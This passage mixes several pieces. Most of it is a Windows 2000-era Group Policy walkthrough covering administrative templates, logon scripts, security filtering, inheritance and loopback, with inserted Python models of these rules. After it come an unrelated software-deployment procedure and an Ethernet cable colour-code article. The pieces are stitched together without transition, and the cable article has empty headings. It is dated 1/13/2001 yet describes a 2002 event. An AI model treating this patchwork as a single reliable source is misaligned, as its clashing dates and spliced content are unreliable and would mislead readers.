Figure 5. User Configuration
The default .adm files offer the following configuration options.
- Conf.adm: NetMeeting settings
- Inetres.adm: Internet Explorer settings
- System.adm: Operating System settings
- wmplayer.adm: Windows Media Player settings
- wuau.adm: Windows Update settings
Adding Administrative Templates
Administrative Templates (.adm files) contain a hierarchy of categories and subcategories that together define how options are organized in the Group Policy user interface.
To add an administrative template (.adm files)
1. On the Headquarters Properties page, double-click the HQ Policy GPO.
2. Under either User Configuration or Computer Configuration, right-click Administrative Templates, and then click Add/Remove Templates. This shows a list of the currently active template files for this Active Directory container.
3. Click Add. This shows a list of the available .adm files in the %systemroot%\inf directory of the computer where Group Policy is being run. You can choose an .adm file from another location. Once chosen, the .adm file will be available for configuration within the GPO.
4. Click Cancel, and then click Close. (No Administrative Templates will be added in these exercises.)
Configuring Administrative Templates
The following steps provide a simple example of using Administrative Templates to remove the Run command from a user’s desktop. You should become familiar with all the available settings offered in the Administrative Templates. Additional step-by-step guides in this series will use settings available in the Administrative Templates.
To set registry-based settings using administrative templates
1. In the Group Policy Object Editor for the HQ Policy GPO, click the plus sign (+) next to Administrative Templates in the User Configuration node.
2. Click Start Menu & Taskbar. Note that the details pane shows all policies as Not configured.
3. In the right pane, double-click the Remove Run menu from Start menu policy.
4. In the Remove Run menu from Start menu dialog box, click Enabled (as shown in Figure 6). Click OK to finish.
Figure 6. Remove Run menu from Start Menu
Note the Previous Policy and Next Policy buttons in the dialog box. You can use these buttons to navigate the details pane for setting the state of other policies. You can also leave the dialog box open and click another policy in the details pane of the Group Policy snap-in. After the details pane has the focus, you can use the Up and Down arrow keys on the keyboard and press Enter to quickly browse through the settings (or Explain tabs) for each policy in the selected node.
Note the change in state to Enabled in the Setting column of the details pane. This change is immediate; it has been saved to the GPO. If you are in a replicated domain controller environment, this action sets a flag that triggers a replication cycle.
If you log on to a workstation in the contoso.com domain with a user from the Headquarters OU, you will note that the Run menu has been removed.
Note: At this point, you may want to experiment with the other available policies. Look at the text in the Explain tab for information about each policy.
Deploying Scripts Through Group Policy Objects
You can define a GPO setting that runs scripts when users log on or log off, or when the system starts or shuts down. All scripts are Windows Scripting Host (WSH)–enabled. As such, they may be JScript or Microsoft Visual Basic® Script files, as well as .bat and .cmd files.
Creating a Logon Script
Note: This procedure uses the welcome.js script described in the Appendix. Create an Included Items folder, and then create the file welcome.js within the Included Items folder by copying the script from the Appendix in this guide.
To define a logon script Group Policy setting
1. Close the Group Policy Object Editor for the HQ Policy.
2. In the Headquarters Properties dialog box, click Close.
3. In the GPWalkthrough console, right-click the contoso.com domain, click Properties, and then click the Group Policy tab.
4. On the Group Policy properties page, select the Default Domain Policy GPO from the Group Policy objects links list, and then click Edit to open the Group Policy Object Editor snap-in.
5. In the Group Policy snap-in, under User Configuration, click the plus sign (+) next to Windows Settings, and then click the Scripts (Logon/Logoff) node.
6. In the details pane, double-click Logon.
The Logon Properties dialog box displays the list of scripts that run when a designated user logs on. This is an ordered list, with the script that is to run first appearing at the top of the list. You can change the order by selecting a script, and then using the Up or Down arrow keys.
To add a new script to the list, click the Add button. This displays the Add a Script dialog box. Browsing from this dialog box allows you to specify the name of an existing script located in the current GPO, or to browse to another location and select it for use in this GPO. The script file must be accessible to the user at logon, or it does not run. Scripts in the current GPO are automatically available to the user. To create a new script, right-click the empty space, select New, and then select a new file.
To edit the name or the parameters of an existing script in the list, select it, and then click the Edit button. This button does not allow the script itself to be edited. To edit the script, use the Show Files button. To remove a script from the list, select it, and then click Remove. The Show Files button displays a Windows Explorer view of the scripts for the GPO. This allows quick access to these files, or to the place to copy support files to if the script files require them. If you change a script file name from this location, you must also use the Edit button to change the file name, or the script cannot execute.
Note: If the View Folder Options for this folder are set to Hide file extensions for known file types, the file may have an unwanted extension that prevents it from being run.
7. Click the Start button, click All Programs, click Accessories, and then click Windows Explorer. Navigate to the welcome.js file in the Included Items directory, right-click the file, and then click Copy.
8. Close Windows Explorer.
9. In the Logon Properties dialog box, click the Show Files button, and paste the welcome.js script into the default file location. It should appear as shown in Figure 7.
Figure 7. Welcome.js Script Included in the Default Domain Policy
10. Close the window containing welcome.js.
11. In the Logon Properties dialog box, click Add.
12. In the Add a Script dialog box, click Browse. In the Browse dialog box, double-click the welcome.js file.
13. In the Add a Script dialog box, click OK (no script parameters are needed), and then click OK again.
14. Close the Group Policy Object Editor.
15. On the contoso.com Properties page, click Cancel.
This script will be immediately available to any member of contoso.com since it was defined within the Default Domain Policy. You can log on to a client workstation to verify that the script is run when a user logs on.
Defining a Logoff or Computer Startup or Shutdown Script
You can use the same procedure outlined in the section Creating a Logon Script to set up scripts that run when a user logs off or when a computer starts or shuts down. For logoff scripts, you would select Logoff in step 6 in Creating a Logon Script. For computer Startup or Shutdown scripts, switch to Computer Configuration – Windows Settings – Scripts (Startup/Shutdown) in the Group Policy Object Editor.
Other Script Considerations
By default, Group Policy scripts that run in a command window (such as .bat or .cmd files) run hidden, whereas legacy scripts (those defined in the user object) are, by default, visible as they are processed. A Group Policy setting allows this visibility to be changed. The policy for users is called Run logon scripts visible or Run logoff scripts visible, and is accessed in the User Configuration\Administrative Templates node, under System\Scripts. For computers, the policy is Run startup scripts visible or Run shutdown scripts visible, and can be accessed in the Computer Configuration\Administrative Templates node, under System\Scripts.
Security Group Filtering
You can refine the effects of any GPO on users or computers by stipulating how a selected GPO is applied to security groups. To do this, use the Security tab on the Properties page of a GPO to set DACLs. DACLs are used primarily for performance reasons, although the feature allows for tremendous flexibility in designing and deploying GPOs, and the policies they contain.
By default, GPOs affect all users and machines that are contained in the linked site, domain, or OU. By using DACLs, the effect of any GPO can be modified to exclude or include the members of any security group.
To filter GPO application based on Security Group membership
1. In the GPWalkthrough console, under the Accounts OU, right-click the Headquarters OU, and then click Properties.
2. In the Headquarters Properties dialog box, click the Group Policy tab.
3. Right-click the HQ Policy GPO in the Group Policy Object Links list, and then select Properties from the context menu.
4. On the Properties page, click the Security tab.
5. On the Security property page, click Add.
6. In the Select Users, Computers, and Groups dialog box, type Management in the Enter the object names to select box, and then click OK.
7. In the Security tab on the HQ Policy Properties page, select the Management group, and view the permissions.
Note: By default, only the Read Access Control Entry (ACE) is set to Allow for the Management group. This means that the members of the Management group do not have this GPO applied to them unless they are also members of another group (by default, they are also Authenticated Users) that has the Apply Group Policy ACE selected. At this point, everyone in the Authenticated Users group has this GPO applied, including members of the Management security group, as shown in Figure 8.
Figure 8. Authenticated Users
To configure the GPO to apply only to members of the Management group
1. Select the Allow check box for the Apply Group Policy ACE for the Management group.
2. Clear the Allow check box for the Apply Group Policy ACE for the Authenticated Users group.
Note: By changing the ACEs that are applied to different groups, administrators can customize how a GPO affects the users or computers that are subject to that GPO. Write access is required for modifications to be made; the Read and Apply Group Policy ACEs are required for a policy to be applied to the group.
To deny GPO application to members of the Management group
Note: Use the Deny ACE with caution. A Deny ACE setting for any group has precedence over any Allow ACE given to a user or computer because of membership in another group. For more information about this interaction, see the Windows 2000 Server online Help and search for Security Group.
1. Clear the Allow check box and select the Deny check box for the Apply Group Policy ACE for the Management group.
2. Select the Allow check box for the Apply Group Policy ACE for the Authenticated Users group.
Figure 9 shows an example of the security settings that allow everyone to be affected by this GPO, except the members of the Management group, who are explicitly denied permission to the GPO. If a member of the Management group were also a member of a group that had an explicit Allow setting for the Apply Group Policy ACE, the Deny setting would take precedence and the GPO would not affect the user.
Figure 9. Deny GPO Assignment Based on Group Membership
3. Click OK, and then click Yes to acknowledge the warning about using Deny ACLs.
4. Click OK to close the Headquarters Property page.
Variations on this procedure may include:
• Adding additional GPOs with different sets of policies and having them apply only to groups other than the Management group.
• Creating another group with members of the existing groups in it, and then using those groups as filters for a GPO.
Note: You can use these same types of security options with the Logon scripts you set up in the preceding section. You can set a script to run only for members of a particular group or for everyone except the members of a specific group.
Security group filtering has two functions: the first is to modify which group is affected by a particular GPO, and the second is to delegate which group of administrators can modify the contents of the GPO by restricting Full Control to a limited set of administrators (by a group). This is recommended because it limits the chance of multiple administrators making changes at any one time.
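The three permission configurations above, worked through as an added example that is not part of this guide: a small Python model of the Read and Apply Group Policy ACE rules (a Deny for any of the principal's groups wins, and both permissions must be allowed), run against constructed ACLs for the HQ Policy GPO.

```python
# Added example (not from the walkthrough): models how the Read and Apply Group Policy
# ACEs on a GPO decide whether the GPO is applied to a given user or computer.
AUTHENTICATED_USERS = "Authenticated Users"
NEEDED = {"Read", "Apply Group Policy"}   # both must be allowed for the GPO to apply


def gpo_applies(acl, member_of):
    """acl: list of (trustee, permission, access) ACEs, with permission in
    {"Read", "Apply Group Policy"} and access in {"Allow", "Deny"}.
    member_of: the security groups the principal belongs to.
    A Deny hitting any of the principal's groups overrides every Allow, exactly as the
    walkthrough warns; otherwise Read and Apply Group Policy must both be allowed."""
    groups = set(member_of) | {AUTHENTICATED_USERS}   # every logged-on principal is an Authenticated User
    allowed, denied = set(), set()
    for trustee, permission, access in acl:
        if trustee in groups:
            (allowed if access == "Allow" else denied).add(permission)
    if denied & NEEDED:
        return False
    return NEEDED <= allowed


# Constructed ACLs for the three states of the HQ Policy GPO in the walkthrough.
DEFAULT_ACL = [                          # after step 7: Management added with Read only
    (AUTHENTICATED_USERS, "Read", "Allow"),
    (AUTHENTICATED_USERS, "Apply Group Policy", "Allow"),
    ("Management", "Read", "Allow"),
]
MANAGEMENT_ONLY_ACL = [                  # Apply allowed for Management, cleared for Authenticated Users
    (AUTHENTICATED_USERS, "Read", "Allow"),
    ("Management", "Read", "Allow"),
    ("Management", "Apply Group Policy", "Allow"),
]
DENY_MANAGEMENT_ACL = [                  # everyone except Management, via an explicit Deny
    (AUTHENTICATED_USERS, "Read", "Allow"),
    (AUTHENTICATED_USERS, "Apply Group Policy", "Allow"),
    ("Management", "Read", "Allow"),
    ("Management", "Apply Group Policy", "Deny"),
]


def filtering_results():
    """Outcome for a Management member and a user in no extra groups, per configuration."""
    return {
        "default": (gpo_applies(DEFAULT_ACL, ["Management"]), gpo_applies(DEFAULT_ACL, [])),
        "management only": (gpo_applies(MANAGEMENT_ONLY_ACL, ["Management"]),
                            gpo_applies(MANAGEMENT_ONLY_ACL, [])),
        "deny management": (gpo_applies(DENY_MANAGEMENT_ACL, ["Management"]),
                            gpo_applies(DENY_MANAGEMENT_ACL, [])),
    }
```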
Policy Inheritance
In general, Group Policy is passed down from parent to child containers within a domain. Group Policy is not inherited from parent to child domains. If you assign a specific Group Policy setting to a high-level parent container, that Group Policy setting applies to all containers beneath the parent container, including the user and computer objects in each container. However, if you explicitly specify a Group Policy setting for a child container, the child container’s Group Policy setting overrides the parent container’s setting.
If a parent OU has policy settings that are not configured, the child OU does not inherit them. Policy settings that are disabled are inherited as disabled. In addition, if a policy setting is configured (enabled or disabled) for a parent OU and the same policy setting is not configured for a child OU, the child inherits the parent’s enabled or disabled policy setting.
If a policy setting that is applied to a parent OU and a policy setting that is applied to a child OU are compatible, the child OU inherits the parent policy setting, and the child’s setting is also applied.
If a policy setting that is configured for a parent OU is incompatible with the same policy setting that is configured for a child OU (because the setting is enabled in one case and disabled in the other), the child does not inherit the policy setting from the parent. The policy setting in the child is applied.
Blocking Inheritance and No Override
The Block Policy inheritance option blocks GPOs that apply higher in the Active Directory hierarchy of sites, domains, and OUs. It does not block GPOs if they have No Override enabled. The Block Policy inheritance option is set only on sites, domains, and OUs, not on individual GPOs. These settings provide complete control over the default inheritance rules.
In the following section, you set up a GPO in the Accounts OU, which applies by default to the users (and computers) in all child objects within the Accounts OU. You then establish another GPO in the Accounts OU and set it as No override. These settings will apply to all child objects even if settings conflict with other settings applied through a GPO. You will then use the Block inheritance feature to prevent group policies set in a parent site, domain, or OU (in this case, the Accounts OU) from being applied to the Production OU.
To create new GPOs
1. In the GPWalkthrough MMC and under contoso.com, right-click the Accounts OU.
2. Click Properties, and then click the Group Policy tab.
3. Click New, enter Default User Policies for the GPO name, and then press Enter.
4. Click New again, enter Enforced User Policies for the GPO name, and then press Enter.
5. Click the Enforced User Policies GPO, and then click the Up button to move it to the top of the list.
Note: The Enforced User Policies GPO should have the highest precedence. Note that this step only serves to demonstrate the functionality of the Up button; an enforced GPO always takes precedence over those that are not enforced.
6. Select the No override setting for the Enforced User Policies GPO by double-clicking the No override column or using the Options button. The Accounts Properties page should now appear as in Figure 10.
Figure 10. Enforced User Policies with No Override
To enable settings in the Enforced User Policies and Default User Policies GPOs
1. On the Accounts Properties page, double-click the Enforced User Policies GPO.
2. In the Group Policy Object Editor, under User Configuration, expand Administrative Templates.
3. Expand System, and then click Ctrl+Alt+Del Options.
4. In the details pane, double-click the Remove Task Manager policy, click Enabled in the Remove Task Manager dialog box, and then click OK. For more information about the policy, click the Explain tab. The setting is now Enabled as shown in Figure 11.
Figure 11. Disabling the Use of Task Manager
5. Click File, and then click Exit to close the Group Policy Object Editor.
6. In the Accounts Properties dialog box, on the Group Policy tab, double-click the Default User Policies GPO in the Group Policy objects links list.
7. In the Group Policy Object Editor, under User Configuration, expand Administrative Templates, expand Desktop, and then click Active Desktop.
8. In the details pane, double-click the Disable Active Desktop policy.
9. Click Enabled, click OK, and then click OK.
10. Click File, and then click Exit to close the Group Policy Object Editor.
Logging on to a client workstation as any user under the Accounts OU, including child OUs, will apply both the Default User and Enforced User GPOs. Both Task Manager and the Active Desktop will be disabled.
Increasing the Performance of GPOs
Because these GPOs are used solely for user configuration, the computer portion of the GPO can be disabled. Disabling the computer configuration settings reduces the target computer’s startup time as the computer GPOs do not need to be evaluated.
If no computers exist within the Accounts, or any child OUs, disabling the computer portion of the GPO has no immediate benefit. However, since these GPOs could later be linked to a different container that may include computers, you may want to disable the computer side of these GPOs.
To disable the computer portion of a GPO
1. In the Accounts Properties dialog box, right-click the Enforced User Policies GPO, and then select Properties.
2. In the Enforced User Policies Properties dialog box, click the General tab (default), and then select the Disable computer configuration settings check box. In the Confirm Disable dialog box, click Yes, and then click OK to finish.
Note that the General properties page includes two check boxes, one for disabling each portion of the GPO.
3. Repeat steps 1 and 2 for the Default User Policies GPO.
Blocking Inheritance
You can block inheritance so that a container does not inherit the GPOs linked above it in the hierarchy. The following example shows how to block inheritance so that, of the GPOs linked at the Accounts OU, only the settings in Enforced User Policies affect the users in the Production OU.
To block inheritance of Group Policy for the Production OU
1. In the Accounts Properties dialog box, click Close.
2. Under the Accounts OU in the GPWalkThrough console, right-click the Production OU, select Properties on the context menu, and then click the Group Policy tab.
3. Select the Block Policy inheritance check box, and then click OK.
To verify that inherited settings are now blocked, you can log on as any user in the Production OU. Note that the Active Desktop is available; however, Task Manager remains disabled, since the GPO that disables it was set to No Override in the parent OU.
Linking a GPO to Multiple Sites, Domains, and OUs
This section demonstrates how you can link a GPO to more than one container (site, domain, or OU) in Active Directory. Depending on the exact OU configuration, you can use other methods to achieve similar Group Policy effects; for example, you can use security group filtering or you can block inheritance. In some cases, however, those methods do not have the desired effects. Whenever you need to explicitly state which sites, domains, or OUs need the same set of policies, use the following method.
To link a GPO to multiple sites, domains, and OUs
1. Under the Accounts OU in the GPWalkThrough console, right-click the Headquarters OU, select Properties on the context menu, and then click the Group Policy tab.
2. In the Headquarters Properties dialog box, on the Group Policy tab, click New to create a new GPO named Linked Policies.
3. Select the Linked Policies GPO, and then click Edit.
4. In the Group Policy Object Editor, under User Configuration and Administrative Templates, click Control Panel, and then click Display.
5. In the details pane, double-click the Prevent changing wallpaper policy, and then click Enabled. Click OK to continue.
6. Click File, and then click Exit to close the Group Policy Object Editor.
7. In the Headquarters Properties page, click Close.
8. Under the Accounts OU in the GPWalkThrough console, right-click the Production OU, click Properties on the context menu, and then click the Group Policy tab on the Production Properties dialog box.
9. Click Add, or right-click the blank area of the Group Policy objects links list, and select Add on the context menu.
10. In the Add a Group Policy Object Link dialog box, click the down arrow on the Look in box, and select the Accounts.contoso.com OU.
11. Double-click the Headquarters.Accounts.contoso.com OU in the Domains, OUs, and linked Group Policy objects list.
12. Click the Linked Policies GPO, and then click OK.
13. Click OK to finish.
You have now linked a single GPO to two OUs. Changes made to the GPO in either location result in a change for both OUs.
Loopback Processing
Loopback provides alternatives to the default method of obtaining the ordered list of GPOs whose User Configuration settings affect a user. By default, a user’s settings come from a GPO list that depends on the user’s location in Active Directory. The ordered list goes from site-linked to domain-linked to OU-linked GPOs, with inheritance determined by the location of the user in Active Directory and in an order that is specified by the administrator at each level.
Loopback can be set to Not Configured, Enabled, or Disabled, as can any other Group Policy setting. In the Enabled state, loopback can be set to Merge or Replace.
• Loopback with Replace: The GPO list for the user is replaced in its entirety by the GPO list that was already obtained for the computer at computer startup. The User Configuration settings from this list are applied to the user.
• Loopback with Merge: The GPO list is a concatenation. The default GPOs for the computer are appended to the default GPOs for the user, and the user gets the User Configuration settings in the concatenated list. Note that the GPO list that was obtained for the computer is applied later and, therefore, it has precedence if it conflicts with settings in the user’s list.
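Added example, not from this guide: a Python model of the GPO ordering rules described in the Policy Inheritance, Blocking Inheritance and No Override, and Loopback Processing sections, run against a constructed copy of the contoso.com layout used in these exercises. The user setting placed in the Loopback Policies GPO is hypothetical, added only so that the Replace and Merge results differ from the default.

```python
# Added example (not from the walkthrough): Group Policy ordering with Block Policy
# inheritance, No Override and loopback, on constructed sample data.
from dataclasses import dataclass, field


@dataclass
class GPO:
    name: str
    user_settings: dict = field(default_factory=dict)      # policy -> "Enabled" / "Disabled"
    computer_settings: dict = field(default_factory=dict)
    computer_side_enabled: bool = True   # False = "Disable computer configuration settings" checked
    user_side_enabled: bool = True       # False = "Disable user configuration settings" checked


@dataclass
class Container:                         # a site, domain or OU
    name: str
    links: list = field(default_factory=list)   # (GPO, no_override); index 0 = top of the links list
    block_inheritance: bool = False


def effective_gpo_list(chain):
    """chain: containers from the site/domain down to the object's own OU.
    Returns GPOs in application order; a GPO later in the list wins on conflicting settings."""
    applied, enforced_levels = [], []
    for container in chain:
        if container.block_inheritance:
            applied = []                 # Block Policy inheritance drops inherited GPOs ...
        level = []                       # ... but never the No Override ones collected here
        for gpo, no_override in reversed(container.links):   # bottom of the list is applied first
            (level if no_override else applied).append(gpo)
        enforced_levels.append(level)
    for level in reversed(enforced_levels):   # No Override GPOs go last; the highest container's win
        applied.extend(level)
    return applied


def resolve(gpos, side):
    """Merge one side's settings in application order; Not configured (absent) changes nothing."""
    result = {}
    for gpo in gpos:
        if side == "user" and gpo.user_side_enabled:
            result.update(gpo.user_settings)
        elif side == "computer" and gpo.computer_side_enabled:
            result.update(gpo.computer_settings)
    return result


def user_settings(user_chain, computer_chain, loopback=None):
    """loopback: None (not configured or disabled), "Replace" or "Merge", as set on the computer."""
    user_list = effective_gpo_list(user_chain)
    if loopback is None:
        return resolve(user_list, "user")
    computer_list = effective_gpo_list(computer_chain)
    if loopback == "Replace":
        return resolve(computer_list, "user")
    return resolve(user_list + computer_list, "user")   # Merge: computer list applied later, so it wins


# Constructed contoso.com layout following the walkthrough (sample data, not exported from a domain).
hq_policy = GPO("HQ Policy", {"Remove Run menu from Start menu": "Enabled"})
enforced_user = GPO("Enforced User Policies", {"Remove Task Manager": "Enabled"}, computer_side_enabled=False)
default_user = GPO("Default User Policies", {"Disable Active Desktop": "Enabled"}, computer_side_enabled=False)
linked = GPO("Linked Policies", {"Prevent changing wallpaper": "Enabled"})
# Hypothetical user setting in the Loopback Policies GPO, present only to make the loopback modes visible.
loopback_gpo = GPO("Loopback Policies", {"Remove Task Manager": "Disabled"})

domain = Container("contoso.com")
accounts = Container("Accounts", [(enforced_user, True), (default_user, False)])
headquarters = Container("Headquarters", [(hq_policy, False), (linked, False)])
production = Container("Production", [(linked, False)], block_inheritance=True)
resources = Container("Resources")
desktop = Container("Desktop", [(loopback_gpo, False)])

HQ_USER = [domain, accounts, headquarters]        # a user in the Headquarters OU
PROD_USER = [domain, accounts, production]        # a user in the Production OU (inheritance blocked)
DESKTOP_PC = [domain, resources, desktop]         # a computer in the Desktop OU (loopback GPO)
```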
To enable Loopback processing
1. Expand the Resources OU in the GPWalkThrough console, right-click the Desktop OU, click Properties on the context menu, and then click the Group Policy tab in the Desktop Properties dialog box.
2. Click New to create a new GPO named Loopback Policies.
3. Select the Loopback Policies GPO, and then click Edit.
4. In the Group Policy Object Editor, in the Computer Configuration node, expand Administrative Templates, expand System, and then click Group Policy.
5. In the details pane, double-click the User Group Policy loopback processing mode policy.
6. Click Enabled in the User Group Policy loopback processing mode dialog box, select Replace (default) in the Mode drop-down list, and then click OK.
How to Create a Network Share
Create a folder to hold the Windows Installer package (Winnt32.msi) on a network server, give the folder the correct permissions to permit the users and the computers to read and run the files, and then copy the I386 folder from the Windows XP Professional CD-ROM to this folder.
How to Create a Group Policy Object (GPO)
You can create a GPO for a domain, an organizational unit, or a site. Microsoft recommends that you assign a GPO to an organizational unit that contains the users whose workstations you want to upgrade. To create a GPO:
1. Click Start, point to Administrative Tools, and then click Active Directory Users and Computers.
2. Right-click the container that you want to link the GPO to, and then click Properties.
3. Click the Group Policy tab, click New, and then type a name for the new GPO in the New Group Policy Object box.
4. Click the GPO that you created in step 3, and then click Edit.
5. Expand User Configuration, and then expand Software Settings.
6. Right-click Software installation, point to New, and then click Package.
7. In the Look in box, locate the share that contains the I386 folder. Make sure that the path that you enter is an accessible Universal Naming Convention (UNC) path and not a file system path.
8. Open the share that contains the Windows Installer package, click Winnt32.msi, and then click Open.
9. Click Publish, and then click OK.
ETHERNET CABLE
ETHERNET CABLE: COLOR-CODE STANDARDS
The information listed here is to assist Network Administrators in the color coding of Ethernet cables. Please be aware that modifying Ethernet cables improperly may cause loss of network connectivity. Use this information at your own risk, and ensure all connectors and cables are modified in accordance with standards. The Internet Centre and its affiliates cannot be held liable for the use of this information in whole or in part.
T-568A Straight-Through Ethernet Cable
The TIA/EIA 568-A standard, which was ratified in 1995, was replaced by the TIA/EIA 568-B standard in 2002 and has been updated since. Both standards define the T-568A and T-568B pin-outs for using Unshielded Twisted Pair cable and RJ-45 connectors for Ethernet connectivity. The standards and pin-out specification appear to be related and interchangeable, but they are not the same and should not be used interchangeably.
T-568B Straight-Through Ethernet Cable
Both the T-568A and the T-568B standard Straight-Through cables are used most often as patch cords for your Ethernet connections. If you require a cable to connect two Ethernet devices directly together without a hub, or when you connect two hubs together, you will need to use a Crossover cable instead.
RJ-45 Crossover Ethernet Cable
A good way of remembering how to wire a Crossover Ethernet cable is to wire one end using the T-568A standard and the other end using the T-568B standard. Another way of remembering the color coding is to simply switch the Green set of wires in place with the Orange set of wires. Specifically, switch the solid Green (G) with the solid Orange, and switch the green/white with the orange/white.
Ethernet Cable Instructions:
Ethernet Cable Tips:
Basic Theory:
By looking at a T-568A UTP Ethernet straight-through cable and an Ethernet crossover cable with a T-568B end, we see that the TX (transmitter) pins are connected to the corresponding RX (receiver) pins, plus to plus and minus to minus. You can also see that both the blue and brown wire pairs on pins 4, 5, 7, and 8 are not used in either standard. What you may not realize is that these same pins 4, 5, 7, and 8 are not used or required in 100BASE-TX either. So why bother using these wires? For one thing, it is simply easier to make a connection with all the wires grouped together. Otherwise you’ll be spending time trying to fit those tiny little wires into each of the corresponding holes in the RJ-45 connector.
Date: 1/13/2001
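The crossover rule above (T-568A on one end, T-568B on the other, or equivalently swapping the green and orange pairs) and the TX-to-RX result, checked pin by pin as an added example that is not part of the article. The pin colours are the standard T-568A/T-568B assignments; the 10/100 signal names per pin are assumed from those standards.

```python
# Added example (not from the article): T-568A / T-568B pin assignments and the crossover rule.
T568A = {1: "white/green", 2: "green", 3: "white/orange", 4: "blue",
         5: "white/blue", 6: "orange", 7: "white/brown", 8: "brown"}
T568B = {1: "white/orange", 2: "orange", 3: "white/green", 4: "blue",
         5: "white/blue", 6: "green", 7: "white/brown", 8: "brown"}

# Signal carried on each pin in 10BASE-T / 100BASE-TX; pins 4, 5, 7 and 8 are unused there.
SIGNALS = {1: "TX+", 2: "TX-", 3: "RX+", 6: "RX-"}


def swap_pairs(pinout, colour_a="green", colour_b="orange"):
    """The article's second rule: exchange the green pair with the orange pair,
    solid with solid and striped with striped."""
    def swap(colour):
        if colour.endswith(colour_a):
            return colour.replace(colour_a, colour_b)
        if colour.endswith(colour_b):
            return colour.replace(colour_b, colour_a)
        return colour
    return {pin: swap(colour) for pin, colour in pinout.items()}


def wire_map(end1, end2):
    """For each pin on end 1, the pin on end 2 reached by the same physical wire (same colour)."""
    pin_by_colour = {colour: pin for pin, colour in end2.items()}
    return {pin: pin_by_colour[colour] for pin, colour in end1.items()}


def signal_map(end1, end2):
    """Which end-1 signal arrives on which end-2 signal, for the four pins 10/100 Ethernet uses."""
    return {SIGNALS[p1]: SIGNALS.get(p2)
            for p1, p2 in wire_map(end1, end2).items() if p1 in SIGNALS}
```

Wiring one end T-568A and the other T-568B gives the same cable as swapping the green and orange pairs, and the signal map shows each transmit pin landing on the matching receive pin.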